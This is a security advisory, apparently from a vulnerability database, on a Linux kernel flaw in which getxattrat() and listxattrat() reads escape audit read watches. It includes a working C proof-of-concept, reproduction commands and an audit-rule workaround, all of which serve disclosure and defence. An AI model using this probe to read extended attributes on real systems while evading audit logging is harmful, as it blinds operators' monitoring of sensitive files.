Linux Kernel Audit Subsystem Bypass Vulnerability via Missing Syscalls

Vulnerability

A vulnerability in the Linux kernel audit subsystem allows audit rules to be bypassed because two system calls were missing from the audit read class. File watches with read permission (what `auditctl -w PATH -p r` creates) are matched against that class, and the classic getxattr() and listxattr() calls belong to it. Their 'at' variants, getxattrat() and listxattrat(), were not added to the class when they were introduced, so a process that enumerated or read a file's extended attributes through them matched no read watch and produced no audit record, while the same reads through getxattr() or listxattr() were logged. Both syscalls are read-only; the gap lets an attacker query extended attributes (security labels, file capabilities, ACLs, user.* data) on a watched file without leaving an audit trail, not alter them.

Impact

Exploitation of this vulnerability allows extended-attribute listings and reads on audited files to go unrecorded, creating a blind spot for any monitoring that relies on audit read watches, for example detection of reconnaissance against sensitive files. It does not by itself allow silent modification of attributes: getxattrat() and listxattrat() only read, and the corresponding write operations are separate system calls that are not the subject of this entry.

Reproduction

The vulnerability can be reproduced on an affected kernel (getxattrat() and listxattrat() exist only from Linux 6.13 onward) with auditd running and root privileges: add a read watch on a test file (auditctl -w PATH -p r -k KEY), first confirm the watch works by reading the file's attributes through the classic calls (for example `getfattr -d PATH`, which uses listxattr()/getxattr()) and checking that `ausearch -k KEY` shows the event, then read the attributes through getxattrat() or listxattrat(). Because glibc does not wrap these syscalls, this step needs a small program that invokes them directly. The absence of a new audit record for the second read indicates the bypass.
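The program below is an added example for this entry, not code from the Linux kernel or from this vulnerability database. It invokes listxattrat() and getxattrat() through raw syscall numbers (the generic table values, which x86_64 and arm64 share) so it can be run against a watched file; the watched path, the `user.probe` attribute and the audit key in the comments are assumptions chosen for the walkthrough. The `compare_listxattr()` helper is a sanity check that the at-variant returns exactly what the classic listxattr() returns, which is what makes the missing audit record a class omission rather than a different read.

```c
/*
 * xattrat_audit_probe.c (added example, not from the advisory).
 * Reads extended attributes via raw getxattrat()/listxattrat() syscalls
 * (Linux >= 6.13; glibc has no wrappers). Suggested run, as root with
 * auditd active; path, attribute and key are assumptions:
 *   touch /tmp/xattrat-target
 *   setfattr -n user.probe -v hello /tmp/xattrat-target
 *   auditctl -w /tmp/xattrat-target -p r -k xattrat_test
 *   getfattr -d /tmp/xattrat-target            # classic calls: audited
 *   ./xattrat_audit_probe /tmp/xattrat-target  # at-variants
 *   ausearch -k xattrat_test                   # no new record => vulnerable
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <unistd.h>

/* Generic syscall table numbers, used when the libc headers lack them. */
#ifndef __NR_getxattrat
#define __NR_getxattrat 464
#endif
#ifndef __NR_listxattrat
#define __NR_listxattrat 465
#endif

/* Same 16-byte layout as struct xattr_args in the kernel UAPI. */
struct xattr_args_compat {
    uint64_t value;   /* user pointer to the value buffer */
    uint32_t size;    /* size of that buffer */
    uint32_t flags;   /* must be 0 for getxattrat */
};

/* listxattrat(2) via raw syscall: list length on success, else -errno. */
long raw_listxattrat(int dfd, const char *path, unsigned int at_flags,
                     char *list, size_t size)
{
    long rc = syscall(__NR_listxattrat, dfd, path, at_flags, list, size);
    return rc < 0 ? -errno : rc;
}

/* getxattrat(2) via raw syscall: value length on success, else -errno. */
long raw_getxattrat(int dfd, const char *path, unsigned int at_flags,
                    const char *name, void *value, size_t size)
{
    struct xattr_args_compat args = {
        .value = (uint64_t)(uintptr_t)value,
        .size = (uint32_t)size,
        .flags = 0,
    };
    long rc = syscall(__NR_getxattrat, dfd, path, at_flags, name,
                      &args, sizeof args);
    return rc < 0 ? -errno : rc;
}

/*
 * Check that the at-variant performs the same read as classic listxattr(2).
 * Returns 0 if both succeed with identical output, -ENOSYS or -EPERM if the
 * new syscall is unavailable (older kernel, seccomp), -EIO if the listings
 * differ, otherwise the -errno of whichever call failed.
 */
int compare_listxattr(const char *path)
{
    char legacy[4096], atvariant[4096];
    ssize_t n_old = listxattr(path, legacy, sizeof legacy);
    if (n_old < 0)
        return -errno;
    long n_new = raw_listxattrat(AT_FDCWD, path, 0, atvariant, sizeof atvariant);
    if (n_new < 0)
        return (int)n_new;
    if (n_new != n_old || memcmp(legacy, atvariant, (size_t)n_old) != 0)
        return -EIO;
    return 0;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : ".";
    char list[4096], value[256];
    long n = raw_listxattrat(AT_FDCWD, path, 0, list, sizeof list);
    if (n < 0) {
        fprintf(stderr, "listxattrat(%s): %s\n", path, strerror((int)-n));
        return 1;
    }
    printf("listxattrat(%s): %ld bytes of names\n", path, n);
    /* The list is a run of NUL-terminated names; fetch each value. */
    for (long off = 0; off < n; off += (long)strlen(list + off) + 1) {
        const char *name = list + off;
        long vlen = raw_getxattrat(AT_FDCWD, path, 0, name, value, sizeof value);
        if (vlen < 0)
            printf("  %s: getxattrat: %s\n", name, strerror((int)-vlen));
        else
            printf("  %s = %.*s\n", name, (int)vlen, value);
    }
    return 0;
}
```

Build with `gcc -O2 -o xattrat_audit_probe xattrat_audit_probe.c`. On a kernel older than 6.13, or under a seccomp profile that denies unknown syscall numbers, the program reports ENOSYS or EPERM, which also means the bypass is not reachable there. Values are printed as text for readability; binary attributes such as `security.capability` will look garbled but are read correctly.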

Remediation

Update to a kernel that carries the fix: Linux 7.0 or later, or one of the stable/LTS releases this entry lists as patched: 5.10, 5.15, 6.1, 6.6, 6.12, 6.18 and 6.19. Note that getxattrat() and listxattrat() were only introduced in Linux 6.13, so kernels older than that do not expose the syscalls and cannot be bypassed through them; the update matters in practice for 6.13 and newer. On an affected kernel that cannot be updated yet, the blind spot can be closed by auditing the two syscalls explicitly instead of relying on the read class, since a syscall rule does not depend on class membership, for example `auditctl -a always,exit -F arch=b64 -S getxattrat -S listxattrat -F path=/etc/shadow -k xattr_read` (use the numbers 464 and 465 in place of the names if the installed auditctl does not know them).

Added: Mar 17, 2026, 10:26 AM
Updated: Mar 17, 2026, 10:26 AM

Vulnerability Rating

Custom algorithm scores (0-10):

  spread          9.0
  impact          0.6
  exploitability  4.3
  remediation     7.7
  relevance       4.0
  threat          4.8
  urgency         2.9
  incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.